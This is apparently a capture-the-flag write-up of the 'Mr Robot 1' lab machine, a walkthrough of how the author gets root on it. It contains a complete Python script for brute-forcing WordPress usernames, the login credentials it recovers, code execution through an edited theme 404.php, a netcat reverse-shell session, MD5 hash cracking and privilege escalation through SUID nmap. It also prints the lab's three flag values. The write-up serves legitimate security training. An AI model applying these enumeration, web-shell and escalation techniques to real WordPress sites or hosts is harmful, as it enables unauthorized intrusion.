Machine Information
- Mr Robot 1
- Author:
Leon Johnson
Host discovery
- target IP:
10.10.10.129
Information Gathering
Nmap time
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
nmap -p- -T4 10.10.10.129 -A -oA 10.10.10.129
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-01 13:49 +08
Nmap scan report for 10.10.10.129
Host is up (0.00046s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:2B:C3:02 (VMware)
Aggressive OS guesses: Linux 3.10 - 4.11 (98%), Linux 3.2 - 4.9 (94%), Linux 3.2 - 3.8 (93%), Linux 3.18 (93%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 4.2 (92%), Linux 4.4 (92%), Linux 3.16 (91%), Linux 3.16 - 4.6 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.46 ms 10.10.10.129
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.48 seconds
Exploiting Port 80
I started out by looking into their web application and it looks fancy.
Everything there is so blur for me so I decided to go through it while scanning for directories.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.129
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.129
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 213]
/.htaccess (Status: 403) [Size: 218]
/.htpasswd (Status: 403) [Size: 218]
/0 (Status: 301) [Size: 0] [--> http://10.10.10.129/0/]
/admin (Status: 301) [Size: 234] [--> http://10.10.10.129/admin/]
/atom (Status: 301) [Size: 0] [--> http://10.10.10.129/feed/atom/]
/audio (Status: 301) [Size: 234] [--> http://10.10.10.129/audio/]
/blog (Status: 301) [Size: 233] [--> http://10.10.10.129/blog/]
/css (Status: 301) [Size: 232] [--> http://10.10.10.129/css/]
/dashboard (Status: 302) [Size: 0] [--> http://10.10.10.129/wp-admin/]
/favicon.ico (Status: 200) [Size: 0]
/feed (Status: 301) [Size: 0] [--> http://10.10.10.129/feed/]
/images (Status: 301) [Size: 235] [--> http://10.10.10.129/images/]
/image (Status: 301) [Size: 0] [--> http://10.10.10.129/image/]
/Image (Status: 301) [Size: 0] [--> http://10.10.10.129/Image/]
/index.html (Status: 200) [Size: 1188]
/index.php (Status: 301) [Size: 0] [--> http://10.10.10.129/]
/intro (Status: 200) [Size: 516314]
/js (Status: 301) [Size: 231] [--> http://10.10.10.129/js/]
/license (Status: 200) [Size: 19930]
/login (Status: 302) [Size: 0] [--> http://10.10.10.129/wp-login.php]
/page1 (Status: 301) [Size: 0] [--> http://10.10.10.129/]
/phpmyadmin (Status: 403) [Size: 94]
/readme (Status: 200) [Size: 7334]
/rdf (Status: 301) [Size: 0] [--> http://10.10.10.129/feed/rdf/]
/robots (Status: 200) [Size: 41]
/robots.txt (Status: 200) [Size: 41]
/rss (Status: 301) [Size: 0] [--> http://10.10.10.129/feed/]
/rss2 (Status: 301) [Size: 0] [--> http://10.10.10.129/feed/]
/sitemap (Status: 200) [Size: 0]
/sitemap.xml (Status: 200) [Size: 0]
/video (Status: 301) [Size: 234] [--> http://10.10.10.129/video/]
/wp-admin (Status: 301) [Size: 237] [--> http://10.10.10.129/wp-admin/]
/wp-content (Status: 301) [Size: 239] [--> http://10.10.10.129/wp-content/]
/wp-config (Status: 200) [Size: 0]
/wp-includes (Status: 301) [Size: 240] [--> http://10.10.10.129/wp-includes/]
/wp-cron (Status: 200) [Size: 0]
/wp-links-opml (Status: 200) [Size: 228]
/wp-load (Status: 200) [Size: 0]
/wp-mail (Status: 403) [Size: 3018]
/wp-login (Status: 200) [Size: 2740]
/wp-settings (Status: 500) [Size: 0]
/wp-signup (Status: 302) [Size: 0] [--> http://10.10.10.129/wp-login.php?action=register]
/xmlrpc (Status: 405) [Size: 42]
/xmlrpc.php (Status: 405) [Size: 42]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
There’s a lot of directories for this web application. I then look into some of the useful ones such as robots.txt.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
curl 10.10.10.129/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
curl 10.10.10.129/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
wget 10.10.10.129/fsocity.dic
--2024-02-01 14:02:01-- http://10.10.10.129/fsocity.dic
Connecting to 10.10.10.129:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7245381 (6.9M) [text/x-c]
Saving to: ‘fsocity.dic’
fsocity.dic 100%[========================================================================================================================================>] 6.91M --.-KB/s in 0.1s
2024-02-01 14:02:02 (55.6 MB/s) - ‘fsocity.dic’ saved [7245381/7245381]
The robots.txt provided some useful information which one of it looks like a list of usernames or password and another one is some random keys. I then tried to look into other directories which is related to wordpress.
In the login page, there’s a information given when I tried to login. It shows that the username is invalid. I then tried to bruteforce the username and see if its possible to get a valid username. I created a python script to get the username.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
import requests
from bs4 import BeautifulSoup
# URL and other constants
url = "http://10.10.10.129:80/wp-login.php"
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate, br",
"Referer": "http://10.10.10.129/wp-login.php",
"Content-Type": "application/x-www-form-urlencoded",
"Origin": "http://10.10.10.129",
"Connection": "close",
"Upgrade-Insecure-Requests": "1"
}
cookies = {
"s_cc": "true",
"s_fid": "051823D33476B49E-28504DD2ABE3E333",
"s_nr": "1706767146747",
"s_sq": "%5B%5BB%5D%5D",
"wordpress_test_cookie": "WP+Cookie+check"
}
# Open and read username from a file
with open('fsocity.dic', 'r') as file:
for line in file:
user = line.strip() # Remove any trailing newline characters
data = {
"log": user,
"pwd": "a",
"wp-submit": "Log In",
"redirect_to": "http://10.10.10.129/wp-admin/",
"testcookie": "1"
}
# Send the POST request
response = requests.post(url, headers=headers, cookies=cookies, data=data)
soup = BeautifulSoup(response.text, 'lxml')
login_error = soup.find('div', id='login_error')
if not 'Invalid username.' in str(login_error):
print(f"User found: {user}")
break
I managed to get a username.
1
2
python user-enum.py
User found: Elliot
I then tried to brute force the password by modifying the script but it tooks me a long time just to get the password. The username and password to login is Elliot:ER28-0652.
Since it is admin dashboard for wordpress, I tried to look around and upload a php file.
After searching around, I found a function where I could edit php file of the theme. I then tried to write my own simple RCE python shell and test it out.
1
2
curl '10.10.10.129/wp-content/themes/twentyfifteen/404.php?a=id'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Now that I have confirm everything works, I spwan a reverse shell by uploading my malicious code into the 404.php.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
nc -nvlp 7735
listening on [any] 7735 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.129] 41663
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
07:53:02 up 2:09, 0 users, load average: 0.00, 0.05, 0.41
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
daemon@linux:/$ export TERM=xterm
export TERM=xterm
daemon@linux:/$ ^Z
zsh: suspended nc -nvlp 7735
stty raw -echo;fg
Lets move on to privilege escalation
Privilege Escalation
I tried looking around especially in the /home directories and found something.
1
2
daemon@linux:/home/robot$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
A password hash was given in /home/robot which I assume should be the password hash of user robot. I managed to crack the hash with online tools and got the password c3fcd3d76192e4007dfb496cca67e13b:abcdefghijklmnopqrstuvwxyz. With that Password, I instantly tried to login as user robot.
1
2
3
4
5
6
7
8
daemon@linux:/home/robot$ su robot
Password:
robot@linux:~$ cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
robot@linux:~$ sudo -l
[sudo] password for robot:
Sorry, user robot may not run sudo on linux.
robot@linux:~$
After login as user robot, I tried to check for sudo permission but I have no luck with that. I then search for other things again.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
robot@linux:~$ find / -perm -u=s 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
While searchung for SUID permission, I noticed nmap which I could be used to spawn shell according to GTFObin.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
robot@linux:~$ nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> h
Nmap Interactive Commands:
n <nmap args> -- executes an nmap scan using the arguments given and
waits for nmap to finish. Results are printed to the
screen (of course you can still use file output commands).
! <command> -- runs shell command given in the foreground
x -- Exit Nmap
f [--spoof <fakeargs>] [--nmap_path <path>] <nmap args>
-- Executes nmap in the background (results are NOT
printed to the screen). You should generally specify a
file for results (with -oX, -oG, or -oN). If you specify
fakeargs with --spoof, Nmap will try to make those
appear in ps listings. If you wish to execute a special
version of Nmap, specify --nmap_path.
n -h -- Obtain help with Nmap syntax
h -- Prints this help screen.
Examples:
n -sS -O -v example.com/24
f --spoof "/usr/local/bin/pico -z hello.c" -sS -oN e.log example.com/24
nmap> !bash -p
bash-4.3# whoami
root
bash-4.3# cd /root
bash-4.3# ls -la
total 32
drwx------ 3 root root 4096 Nov 13 2015 .
drwxr-xr-x 22 root root 4096 Sep 16 2015 ..
-rw------- 1 root root 4058 Nov 14 2015 .bash_history
-rw-r--r-- 1 root root 3274 Sep 16 2015 .bashrc
drwx------ 2 root root 4096 Nov 13 2015 .cache
-rw-r--r-- 1 root root 0 Nov 13 2015 firstboot_done
-r-------- 1 root root 33 Nov 13 2015 key-3-of-3.txt
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
-rw------- 1 root root 1024 Sep 16 2015 .rnd
bash-4.3# cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
Things I learned from the machine
- python script is hard to write without the help of chatgpt
- wordpress could get reverse shell easily if able to get into admin dashboard